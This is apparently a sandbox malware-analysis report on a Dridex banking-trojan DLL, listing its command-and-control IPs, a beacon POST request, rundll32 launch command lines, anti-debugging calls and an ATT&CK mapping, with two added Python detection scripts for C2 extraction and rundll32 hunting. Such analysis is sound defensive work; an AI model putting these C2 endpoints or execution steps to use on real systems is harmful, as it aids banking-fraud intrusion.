                      Source: rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpString found in binary or memory: https://452.46.210.220/
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6839F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49747 version: TLS 1.2
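The "String found in binary or memory" hits above are heap fragments: many carry trailing garbage ("/Kqfu(", "/oft"), some are two overlapping URLs ("1845.77.0.96", "452.46.210.220", "18185.56.219.47"), and the same endpoint recurs with and without its port. The script below is an added example, not part of the Joe Sandbox report, that reduces such strings to a clean endpoint set (IPv4 only, since every C2 candidate here is a bare IP; the windowsupdate.com CTL download is dropped by that rule) and then checks the observed POST against it. The sample strings and the request are copied from the report lines above and embedded inline; the heuristics and their names are this example's assumptions.

```python
"""Added example: normalise Dridex C2 candidates from memory-dump strings
and score the observed HTTP POST. Not part of the sandbox report."""
import re

# Constructed sample: a subset of the memory strings listed in the report,
# including the truncated and overlap-corrupted ones.
MEMORY_STRINGS = [
    "http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
    "https://143.244.140.214/",
    "https://143.244.140.214:808/",
    "https://143.244.140.214:808/Kqfu(",
    "https://143.244.F",
    "https://18185.56.219.47:8116/~",
    "https://1845.77.0.96:6891/",
    "https://185.56.219.47/",
    "https://185.56.219.47:8116/soft",
    "https://192.46.210.220/",
    "https://192.46.210.220/.0.96:6891/",
    "https://45.77.0.96/",
    "https://45.77.0.96:6891/Microsoft",
    "https://452.46.210.220/",
]

# Observed request, copied from the "HTTP traffic detected" line in the report.
OBSERVED_REQUEST = (
    "POST / HTTP/1.1\r\nHost: 192.46.210.220\r\nContent-Length: 4814\r\n"
    "Connection: Close\r\nCache-Control: no-cache\r\n\r\n"
)

# scheme://IPv4[:port]; whatever follows the port is trailing heap noise.
_URL_RE = re.compile(r"^(https?)://(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?")


def parse_c2(s):
    """Return (ip, port) for a well-formed IPv4 URL prefix, else None.

    Overlap-corrupted strings such as 1845.77.0.96 fail the octet range
    check; 18185.56.219.47 never matches the four-octet pattern at all.
    """
    m = _URL_RE.match(s)
    if not m:
        return None
    scheme, ip, port = m.groups()
    if any(int(octet) > 255 for octet in ip.split(".")):
        return None
    port = int(port) if port else (443 if scheme == "https" else 80)
    if not 1 <= port <= 65535:
        return None
    return ip, port


def extract_c2(strings):
    """Map each candidate IP to the sorted list of ports seen with it."""
    found = {}
    for s in strings:
        hit = parse_c2(s)
        if hit:
            found.setdefault(hit[0], set()).add(hit[1])
    return {ip: sorted(ports) for ip, ports in sorted(found.items())}


def beacon_indicators(raw_request, c2_map):
    """Reasons an HTTP request looks like a C2 check-in (assumed heuristics)."""
    head = raw_request.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    method = lines[0].partition(" ")[0]
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    host = headers.get("host", "").partition(":")[0]
    reasons = []
    if host in c2_map:
        reasons.append(f"host {host} is a known C2 endpoint")
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        reasons.append("Host header is a bare IPv4 address")
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    if method == "POST" and int(headers.get("content-length", "0")) > 0:
        reasons.append("POST with a body to the site root")
    return reasons


if __name__ == "__main__":
    c2 = extract_c2(MEMORY_STRINGS)
    for ip, ports in c2.items():
        print(ip, ports)
    for reason in beacon_indicators(OBSERVED_REQUEST, c2):
        print("-", reason)
```

Endpoints that appear both with and without a port (for example 185.56.219.47 on 443 and on 8116) are kept as separate entries on purpose: the port-less strings may be heap remnants rather than configured C2, and the report's own network section only confirms 192.46.210.220:443.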

                      E-Banking Fraud:

                      Yara detected Dridex unpacked file
                      Source: Yara matchFile source: 3.3.rundll32.exe.53db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.104db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.2d6db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.321db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6e650000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.2d6db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.321db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4dbdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4dbdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.104db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e650000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.838096083.000000006E651000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.417154756.0000000003200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.439012632.0000000002D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.869577587.000000006E651000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.431444346.0000000004DA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440875078.0000000001030000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.415782949.0000000000520000.00000040.00000001.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojan
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6551A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6667C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66A660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E677660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E672E60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E659E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E669E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E671240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E670220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67D620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E65CA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66F6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E668EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6762F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E673EC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E656AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6696D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E668AB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6726B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E671EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66AE80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66BF50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E671730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E673B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E679B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66B71F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66E3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6683C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E667FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E677FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E671020
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66D030
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6688C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E668CC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E65ACD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66A0D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6698DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66E0A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E674CA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6750A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67DCA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E675CB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E667564
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E651570
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E665DE8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6789F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6771F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66FDD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E65F9A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66D980
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67D180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66C590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E69E210
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6622A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67BE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllVirustotal: Detection: 7%
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllReversingLabs: Detection: 18%
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Bluewing
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Masterjust
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1
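The process-creation lines above show the loader pattern a detection engineer would hunt for: rundll32.exe invoked on a DLL under a user profile directory, either by ordinal (#1) or by an arbitrary export name (Bluewing, Earth, Masterjust; the export enumeration is the sandbox's doing, but the export names themselves are the sample's). The script below is an added example, not part of the report, that parses rundll32 command lines and flags those two signals. The events are constructed from the lines above with a benign control added; the field names (`parent`, `image`, `cmdline`) are an assumed schema, not a specific EDR's.

```python
"""Added example: flag suspicious rundll32 launches in process-creation
events such as those listed in the sandbox report. Not the report's code."""
import re

# Constructed from the report's "Process created" lines, plus one benign control.
EVENTS = [
    {"parent": r"C:\Windows\System32\loaddll32.exe",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1"},
    {"parent": r"C:\Windows\System32\loaddll32.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Bluewing"},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1"},
    {"parent": r"C:\Windows\System32\loaddll32.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Earth"},
    # Benign control: a system DLL with a well-known export (constructed).
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

# rundll32 <dll>[,<export|#ordinal>]; the DLL path may be wrapped in ' or ".
_RUNDLL_RE = re.compile(
    r"""^\s*(?:"[^"]*rundll32\.exe"|\S*rundll32\.exe)\s+"""
    r"""(?P<q>['"]?)(?P<dll>[^'"]+?)(?P=q)\s*(?:,\s*(?P<export>\S+))?\s*$""",
    re.IGNORECASE,
)

# Directories an unprivileged user can write to (assumed list, extend as needed).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def parse_rundll32(cmdline):
    """Return (dll_path, export_or_ordinal_or_None) or None if not a rundll32 line."""
    m = _RUNDLL_RE.match(cmdline)
    if not m:
        return None
    return m.group("dll"), m.group("export")


def classify(event):
    """List the reasons a process-creation event looks like a DLL loader."""
    if not event["image"].lower().endswith("\\rundll32.exe"):
        return []
    parsed = parse_rundll32(event["cmdline"])
    if parsed is None:
        return []
    dll, export = parsed
    reasons = []
    if dll.lower().startswith(USER_WRITABLE_PREFIXES):
        reasons.append("DLL loaded from user-writable path")
    if export is not None and export.startswith("#"):
        reasons.append("export called by ordinal")
    return reasons


def hunt(events):
    """Return (cmdline, export, reasons) for every flagged event."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            dll, export = parse_rundll32(ev["cmdline"])
            hits.append((ev["cmdline"], export, reasons))
    return hits


if __name__ == "__main__":
    for cmdline, export, reasons in hunt(EVENTS):
        print(export, reasons, cmdline, sep="  ")
```

Export names are recorded rather than judged: Dridex loaders carry arbitrary exports, so an allowlist of "known good" export names would not catch Bluewing or Earth, whereas the DLL path and the ordinal call are stable signals across samples.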
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engineClassification label: mal84.bank.troj.evad.winDLL@11/1@0/5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.14094Joe Sandbox Cloud Basic: Detection: clean Score: 0
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllStatic file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.845974920.000000006E717000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.888666799.000000006E717000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.19803.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_00F2A051 push ebp; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_00F2A105 push 4796B4D2h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E663930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67CEF8 FindFirstFileExW,
                      Source: loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E6C97B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E6C8B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E6C47C0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E79BA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E79B64D push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E79B942 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E666C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E667A60 RtlAddVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E6963A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 45.77.0.96 235
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.56.219.47 180
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.46.210.220 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 143.244.140.214 40
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1
Source: loaddll32.exe, 00000000.00000002.830495060.0000000001910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.840491551.00000000037F0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.830495060.0000000001910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.840491551.00000000037F0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.830495060.0000000001910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.840491551.00000000037F0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.830495060.0000000001910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.840491551.00000000037F0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E662980 GetUserNameW,

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 112 | Process Injection 112 | OS Credential Dumping | Security Software Discovery 21 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Obfuscated Files or Information 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll32 1 | Security Account Manager | Account Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Owner/User Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 13 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Network Configuration Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 23 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
SecuriteInfo.com.Variant.Razy.980776.19803.dll | 8% | Virustotal |
SecuriteInfo.com.Variant.Razy.980776.19803.dll | 18% | ReversingLabs | Win32.Worm.Cridex

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://192.46.210.220/ | true | URL Reputation: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
                        unknown
                        https://143.244.140.214:808/hyloaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.547291056.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.637891796.00000000033D7000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://192.46.210.220/yloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/zloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/h9rundll32.exe, 00000004.00000003.508903560.0000000003450000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/h.dll9loaddll32.exe, 00000000.00000003.459519197.0000000001158000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/vrundll32.exe, 00000004.00000003.515187644.0000000003450000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/.0.96:6891/loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/~rundll32.exe, 00000004.00000003.707287574.0000000003440000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
